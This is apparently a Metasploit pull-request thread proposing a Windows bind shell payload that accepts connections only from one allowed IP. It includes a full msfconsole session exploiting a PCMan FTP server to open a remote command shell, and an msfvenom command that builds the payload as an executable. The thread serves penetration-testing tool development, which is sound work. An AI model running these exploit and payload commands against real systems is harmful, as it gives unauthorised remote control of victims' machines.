Single tcp bind shell with ACL support (only the IP you set will get the shell). It's just an alternative to the classic bind shell. I think it could be useful if you do not want someone else to steal your shell with a simple netcat. I used the shell_bind_tcp of Stephen Fewer and I modified the accept() call to check the client IP ( this is an increase of 22 bytes.). If the IP is not the one defined in AHOST (Allowed IP) the descriptor is closed and the socket waits for another connection.
I add .asm files, the payload and the respective handler (I used the bind shell handler with a couple of modifications). Let me know other changes needed.
added ACL Bind Shell payload
This looks cool! Do you happen to have sample output/demo usage?
@OJ Thank you.
You only have to use the AHOST to specify the IP allowed to get the shell (Others will be rejected) Ej:
msf> use exploit/windows/ftp/pcman_stor
msf exploit(pcman_stor) > set rhost 192.168.1.39
rhost => 192.168.1.39
msf exploit(pcman_stor) > set payload windows/shell_acl_bind_tcp
payload => windows/shell_acl_bind_tcp
msf exploit(pcman_stor) > set lport 5041
lport => 5041
msf exploit(pcman_stor) > ifconfig | grep 192
[*] exec: ifconfig | grep 192
inet addr:192.168.1.33 Bcast:192.168.1.255 Mask:255.255.255.0
msf exploit(pcman_stor) > set ahost 192.168.1.33
ahost => 192.168.1.33
msf exploit(pcman_stor) > exploit
[*] Connecting to FTP server 192.168.1.39:21...
[*] Started ACL bind handler
[*] Connected to target FTP server.
[*] Authenticating as anonymous with password firstname.lastname@example.org...
[*] Sending password...
[*] Trying victim Windows XP SP3 English...
[*] Command shell session 1 opened (192.168.1.33:59686 -> 192.168.1.39:5041) at 2014-02-12 04:49:35 +0100
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Test\My Documents\Downloads>
Example with msfvenom:
./msfvenom -p windows/shell_acl_bind_tcp AHOST=10.0.0.100 LPORT=1009 -f exe > batman.exe
In this case, only 10.0.0.100 will get the shell
Edit by OJ: Added code format tags
I am sad that @BorjaMerino didn't make a cool video with awesome music this time. Perhaps next time. :P
@wvu-r7 xDD Who said that? Stay tuned
I love your YouTube videos! :D
Since single (#3017) and starger (#3394) bind shell approach is an improved version of this shellcode feel free to refuse this pull request.
Closing in favour of #3017 then